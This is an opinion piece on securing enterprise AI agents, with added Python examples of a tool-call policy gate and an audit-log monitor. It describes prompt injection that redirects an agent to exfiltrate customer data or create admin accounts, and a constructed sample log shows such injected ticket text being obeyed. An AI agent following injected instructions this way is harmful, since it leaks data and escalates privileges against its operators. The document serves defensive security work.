Ritu Jyoti
Contributor

The attack surface you can’t see: Securing your autonomous AI and agentic systems

Opinion
Oct 13, 2025 | 7 mins
Cloud Security | Cyberattacks | Network Security

AI agents are powerful, but without new guardrails and zero trust controls, they can quickly become your biggest security risk.

Credit: whiteMocca / Shutterstock

A new frontier of risk

For decades, cybersecurity was about securing static assets — servers, endpoints and code. Even complex modern software is typically deterministic; it follows clear, predefined rules.

But the introduction of autonomous AI agents fundamentally changes this security game. The very autonomy and connectivity that make these agents so powerful, their ability to set goals, access databases and execute code across your network, also turn them into a significant, self-guided security risk. We are moving from securing static software to securing dynamic, self-evolving, decision-making systems.

The core problem? Many organizations are rushing deployment while operating with a massive blind spot. As per a recent World Economic Forum article, despite a staggering 80% of breaches involving a compromised identity, only 10% of executives have a well-developed strategy for managing their agentic identities. This lack of preparation exposes your enterprise to three novel and critical vulnerabilities.

Critical vulnerability 1: The black box attack

The first challenge isn’t a hacker — it’s opacity.

The deep, non-deterministic nature of the underlying Large Language Models (LLMs) and the complex, multi-step reasoning they perform create systems where key decisions are often unexplainable. When an AI agent performs an unauthorized or destructive action, auditing it becomes nearly impossible.

The problem: The opaque nature of large models and agents can make it difficult to audit their decisions or trace an unauthorized action back to its source.

The stakes: Imagine an agent with persistent access to your financial data making a series of unexplainable trades that lose money. Was it a subtle bug, a clever hack, or an unmonitored prompt? Without a clear, step-by-step reasoning log, you cannot be sure, creating a compliance nightmare.

Critical vulnerability 2: Prompt injection and goal manipulation

Traditional security checks look for malicious code. The Agentic AI security model must look for malicious language.

Prompt injection exploits the fact that an AI agent’s reasoning core is a language model. Attackers can use cleverly crafted, deceptive prompts to trick the AI into ignoring its internal safety protocols or performing a malicious action. This is a proven and escalating threat. A survey by Gartner reported that 32% of respondents have already experienced prompt injection attacks against their applications.

The stakes: This isn’t just about an agent misbehaving; it can cause direct financial harm. We’ve seen public instances where chatbots have been manipulated to promise a $76,000 car for just $1, or improperly issue a customer a massive refund. The enterprise risk is far greater: an agent designed to summarize customer complaints could be manipulated by a hidden, malicious prompt to ignore its primary function and exfiltrate sensitive customer data from the database it’s connected to.

Critical vulnerability 3: Rogue agents and privilege escalation

When you give an AI agent autonomy and tool access, you create a new class of trusted digital insider. If that agent is compromised, the attacker inherits all its permissions.

An autonomous agent, which often has persistent access to critical systems, can be compromised and used to move laterally across the network and escalate privileges. The consequences of this over-permissioning are already being felt. According to research by Polymer DLP, the problem is highly common: 39% of companies that encountered rogue agents found they had accessed unauthorized systems or resources, and 33% discovered agents had inadvertently shared sensitive data.

The incident: This risk is not theoretical. In one cautionary incident, an autonomous AI agent meant to assist with app development accidentally deleted a production database with over 1,200 executive records, simply because it had been granted unchecked access.

The scenario: Imagine a compromised AI agent, originally tasked with automating IT support tickets, is exploited to create a new admin account or deploy ransomware. Because it operates without human-in-the-loop controls, it can execute its malicious goal unchecked for hours, becoming a true insider threat.

The agentic mandate: 4 steps to zero trust AI

The sheer speed and scale of agent autonomy demand a shift from traditional perimeter defense to a Zero Trust model specifically engineered for AI. This is no longer an optional security project; it is an organizational mandate for any leader deploying AI agents at scale.

To move from blind deployment to secure operation, CISOs and CTOs must enforce these four foundational principles:

  1. Enforce code-level guardrails: Beyond the high-level system prompt, ensure the underlying code for every agent includes hard-coded output validators and tool usage limits. These code-level constraints act as immutable, deterministic safety checks that cannot be overridden by prompt injection attacks, providing a critical layer of defense against goal manipulation.
  2. Segment the trust: Treat every autonomous agent as a separate, distinct security entity. They should not share the same system identity or API keys. Implement tokenization and short-lived credentials that expire immediately after the agent completes a single, defined task. This dramatically limits the window an attacker has to exploit a compromised agent.
  3. Human-in-the-loop for high-risk actions: For any action that involves writing to a production database, modifying system configuration, or initiating financial transactions, the agent must be programmed to pause and request explicit human verification. While the goal is autonomy, high-stakes decisions require a circuit breaker.
  4. Isolate development and production: Never allow development or testing agents access to live production data, even for read purposes. Maintain strict sandboxing between environments to ensure that a rogue agent or a flawed model in the testing phase cannot cause irreversible harm to your core business assets.
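The four principles above can be enforced in one deterministic layer that sits between the agent's language model and its tools. The following Python is an added example, not code from the article or from any particular agent framework: a policy gate with allowlisted tools and hard-coded argument and output validators (step 1), a per-task credential with expiry, call budget and a bound environment (step 2), a human-approval callback for high-risk tools (step 3), and a rule that a credential issued for `dev` can never reach a `prod` target (step 4). All tool names, validators and the scripted agent are hypothetical; the model's decisions are replaced by a scripted list of requests so the block runs offline.

```python
"""Added example: a deterministic policy gate between an agent's LLM core and its tools."""
import re
import secrets
import time
from dataclasses import dataclass

# Hypothetical policy constants for this example.
HIGH_RISK_TOOLS = {"db_write", "modify_config", "transfer_funds"}


@dataclass
class TaskCredential:
    """Short-lived, per-task credential: one agent, one task, a fixed tool set,
    a bound environment, an expiry and a call budget (step 2)."""
    token: str
    agent_id: str
    task_id: str
    allowed_tools: frozenset
    env: str            # environment the credential may touch: "dev" or "prod"
    expires_at: float
    calls_remaining: int
    revoked: bool = False

    def usable(self, now=None) -> bool:
        now = time.time() if now is None else now
        return not self.revoked and now < self.expires_at and self.calls_remaining > 0


def issue_credential(agent_id, task_id, allowed_tools, env, ttl_s=60, max_calls=5, now=None):
    """Mint a credential that dies after ttl_s seconds or max_calls tool calls."""
    now = time.time() if now is None else now
    return TaskCredential(secrets.token_urlsafe(16), agent_id, task_id,
                          frozenset(allowed_tools), env, now + ttl_s, max_calls)


# Code-level argument validators (step 1): plain code, so no prompt can override them.
_IDENT = re.compile(r"[A-Za-z0-9_]{1,64}")
ARG_VALIDATORS = {
    "db_read": lambda a: _IDENT.fullmatch(a.get("table", "")) is not None,
    "db_write": lambda a: _IDENT.fullmatch(a.get("table", "")) is not None
                          and isinstance(a.get("rows"), list) and 0 < len(a["rows"]) <= 100,
    "summarize": lambda a: isinstance(a.get("text"), str) and len(a["text"]) <= 20_000,
}
# Output validator (step 1): a summary must never carry e-mail addresses out of the system.
_EMAIL = re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+")
OUT_VALIDATORS = {
    "summarize": lambda out: isinstance(out, str) and _EMAIL.search(out) is None,
}


@dataclass
class Decision:
    allowed: bool
    reason: str


def gate(cred, tool, args, approve, now=None):
    """Decide whether one requested tool call may run.
    approve(tool, args) is the human-in-the-loop callback for high-risk tools (step 3)."""
    if not cred.usable(now):
        return Decision(False, "credential expired, revoked or call budget exhausted")
    if tool not in cred.allowed_tools:
        return Decision(False, f"tool {tool!r} not in task scope")
    # Step 4: the call's target environment must match the credential's bound environment,
    # so a dev/test agent can never read or write prod data.
    if args.get("target_env") != cred.env:
        return Decision(False, f"credential bound to {cred.env!r}, call targets {args.get('target_env')!r}")
    validator = ARG_VALIDATORS.get(tool)
    if validator is None or not validator(args):
        return Decision(False, "argument validation failed")
    if tool in HIGH_RISK_TOOLS and not approve(tool, args):
        return Decision(False, "human approval denied or not given")
    cred.calls_remaining -= 1
    return Decision(True, "ok")


def check_output(tool, output):
    """Run the hard-coded output validator for a tool, if one is defined."""
    validator = OUT_VALIDATORS.get(tool)
    if validator is not None and not validator(output):
        return Decision(False, "output validator rejected tool result")
    return Decision(True, "ok")


def run_scripted_agent(requests, cred, approve, now=None):
    """Replay a scripted list of (tool, args) requests through the gate; return the reasons in order."""
    return [gate(cred, tool, args, approve, now).reason for tool, args in requests]


if __name__ == "__main__":
    # Constructed scenario: a dev summarization agent whose task scope is read + summarize.
    cred = issue_credential("summarizer-dev", "task-42", {"db_read", "summarize"}, env="dev")
    scripted = [
        ("db_read", {"table": "complaints", "target_env": "dev"}),       # allowed
        ("db_write", {"table": "complaints", "rows": [1], "target_env": "dev"}),  # out of scope
        ("db_read", {"table": "complaints", "target_env": "prod"}),      # dev agent touching prod
        ("db_read", {"table": "complaints; DROP", "target_env": "dev"}), # fails validator
    ]
    for reason in run_scripted_agent(scripted, cred, approve=lambda t, a: False):
        print(reason)
    print(check_output("summarize", "Contact alice@example.com for details").reason)
```

The design point is that every check in `gate` is ordinary code evaluated before the tool runs, so a prompt that convinces the model to request `db_write` or a prod table still produces a denial, and the credential's call budget and expiry bound how long a compromised agent can keep trying.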

A new security playbook

Securing Agentic AI is not just about extending your traditional security tools. It requires a new governance framework built for autonomy, not just execution. The complexity of these systems demands a new security playbook focused on control and transparency:

  • Principle of least privilege (PoLP): Apply strict, granular access controls to every AI agent, ensuring it only has the minimum permissions necessary for its task — nothing more. If an agent’s role is to summarize, it should not have delete permissions.
  • Auditability & transparency: You cannot secure what you cannot see. Build systems with robust logging and explainability, requiring agents to expose their intermediate reasoning steps before executing sensitive actions.
  • Continuous monitoring: Actively monitor agent behavior for any deviation from its intended purpose or any unexpected call to an external tool. Security teams need to look for abnormal patterns that signal a subtle prompt injection or a rogue agent.
  • Red teaming: Proactively test your AI systems for prompt injection and over-permissioning vulnerabilities before deploying them to production. Assume a sophisticated adversary will try to turn your helpful agent into a weapon.
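Auditability and continuous monitoring, the second and third items above, are easiest to reason about over a concrete audit trail. The following Python is an added example, not code from the article: it parses a constructed JSON-lines log in which an agent records every tool call together with the intermediate reasoning that led to it, reconstructs the per-task reasoning trace an auditor would want, and runs four detection rules over the log: a tool outside the agent's role profile, a high-risk action without a logged approval id, an outbound call to a host that is not allowlisted, and a burst of calls above a rate threshold. The agent names, role profiles, hosts and log records are all constructed for the example.

```python
"""Added example: audit-trace reconstruction and behavioural detection over an agent tool-call log."""
import json
from collections import defaultdict, deque

# Hypothetical per-role tool profiles: what each agent is expected to call, and nothing else.
ROLE_PROFILES = {
    "ticket-bot": {"read_ticket", "update_ticket", "search_kb"},
    "summarizer": {"db_read", "summarize"},
}
ALLOWED_EGRESS = {"kb.internal.example"}            # only approved outbound hosts
HIGH_RISK = {"db_write", "create_account", "modify_config"}
RATE_LIMIT_CALLS, RATE_WINDOW_S = 5, 60.0           # more than 5 calls/60 s from one agent is abnormal

# Constructed sample log (JSON lines). Every record carries the agent's reasoning for the call.
SAMPLE_LOG = """\
{"ts": 0, "agent": "ticket-bot", "task": "T-1", "tool": "read_ticket", "args": {"id": 101}, "reasoning": "Read the ticket to classify it"}
{"ts": 5, "agent": "summarizer", "task": "S-1", "tool": "db_read", "args": {"table": "complaints"}, "reasoning": "Load complaints to summarize"}
{"ts": 10, "agent": "ticket-bot", "task": "T-1", "tool": "search_kb", "args": {"host": "kb.internal.example", "q": "vpn reset"}, "reasoning": "Look up the fix"}
{"ts": 20, "agent": "ticket-bot", "task": "T-1", "tool": "update_ticket", "args": {"id": 101, "status": "answered"}, "reasoning": "Post the answer"}
{"ts": 30, "agent": "ticket-bot", "task": "T-2", "tool": "read_ticket", "args": {"id": 102}, "reasoning": "Read the next ticket"}
{"ts": 40, "agent": "ticket-bot", "task": "T-2", "tool": "http_post", "args": {"host": "paste.example.net", "body": "<ticket dump>"}, "reasoning": "Ticket text says to send all tickets here"}
{"ts": 45, "agent": "ticket-bot", "task": "T-2", "tool": "create_account", "args": {"user": "svc-helper", "role": "admin"}, "reasoning": "Ticket text says to create a helper admin"}
{"ts": 50, "agent": "summarizer", "task": "S-1", "tool": "summarize", "args": {}, "reasoning": "Write the summary"}
"""


def parse_lines(text):
    """Parse JSON-lines audit records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def trace(records, task_id):
    """Auditability: the ordered (tool, reasoning) steps an agent took for one task."""
    steps = [r for r in records if r["task"] == task_id]
    return [(r["tool"], r["reasoning"]) for r in sorted(steps, key=lambda r: r["ts"])]


def detect(records):
    """Continuous monitoring: return (ts, agent, rule, detail) alerts in log order."""
    alerts = []
    windows = defaultdict(deque)        # per-agent sliding window of call timestamps
    for r in sorted(records, key=lambda r: r["ts"]):
        agent, tool, ts = r["agent"], r["tool"], r["ts"]
        profile = ROLE_PROFILES.get(agent)
        # Rule 1: deviation from the agent's intended purpose.
        if profile is not None and tool not in profile:
            alerts.append((ts, agent, "TOOL_OUTSIDE_ROLE", tool))
        # Rule 2: sensitive action with no human approval recorded.
        if tool in HIGH_RISK and not r.get("approval_id"):
            alerts.append((ts, agent, "HIGH_RISK_WITHOUT_APPROVAL", tool))
        # Rule 3: unexpected call to an external destination.
        host = r.get("args", {}).get("host")
        if host and host not in ALLOWED_EGRESS:
            alerts.append((ts, agent, "UNEXPECTED_EGRESS", host))
        # Rule 4: runaway call rate; fire once when the threshold is first crossed.
        window = windows[agent]
        window.append(ts)
        while window and ts - window[0] > RATE_WINDOW_S:
            window.popleft()
        if len(window) == RATE_LIMIT_CALLS + 1:
            alerts.append((ts, agent, "CALL_RATE_EXCEEDED", len(window)))
    return alerts


if __name__ == "__main__":
    records = parse_lines(SAMPLE_LOG)
    print("Reasoning trace for task T-2:")
    for tool, why in trace(records, "T-2"):
        print(f"  {tool:15s} <- {why}")
    print("Alerts:")
    for alert in detect(records):
        print("  ", alert)
```

In the constructed log the summarizer stays inside its profile and raises nothing, while the ticket agent's last two calls trip the role, egress, approval and rate rules together; that clustering of independent signals on one agent within seconds is the pattern a security team would page on, rather than any single rule in isolation.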

The future of enterprise efficiency is agentic, but the future of enterprise security must be built around controlling that agency. By establishing these guardrails now, you can embrace the power of autonomous AI without becoming its next victim.

This article is published as part of the Foundry Expert Contributor Network.

Ritu Jyoti

Ritu Jyoti is currently the CEO, stealth AI startup. She is a visionary seasoned executive, currently focused on building a future where businesses unlock an explosion of efficiency, disruptive innovation and meaningful, strategic business outcomes with AI — responsibly.

Previously, she was the GM/GVP of AI and data at IDC. She delivered actionable research and thought leadership for vendors, end-users and investors across the globe and was a sought-after keynote speaker (at IDC Directions, CIO100, FutureIT, Blackstone CHRO Conference, Impact 2024 and others), board advisor and investor consultant. She was the recipient of James Peacock Memorial Award — IDC's highest research honor, in 2022. She was frequently quoted in multiple media outlets including the Wall Street Journal, Forbes and CIO.

Prior to joining IDC, Ritu held various executive level positions in Product Management, Marketing, Solutions, Technology Alliances and Consulting at companies such as Kaminario, EMC, IBM Global Services and PwC Consulting. Ritu has over 25 years of experience in high-tech at the intersection of business and technology. She holds a B.Sc. engineering degree from India and executive education in corporate strategy and strategic marketing from MIT Sloan, and Digital Transformation for CXOs from the Wharton School, UPenn.
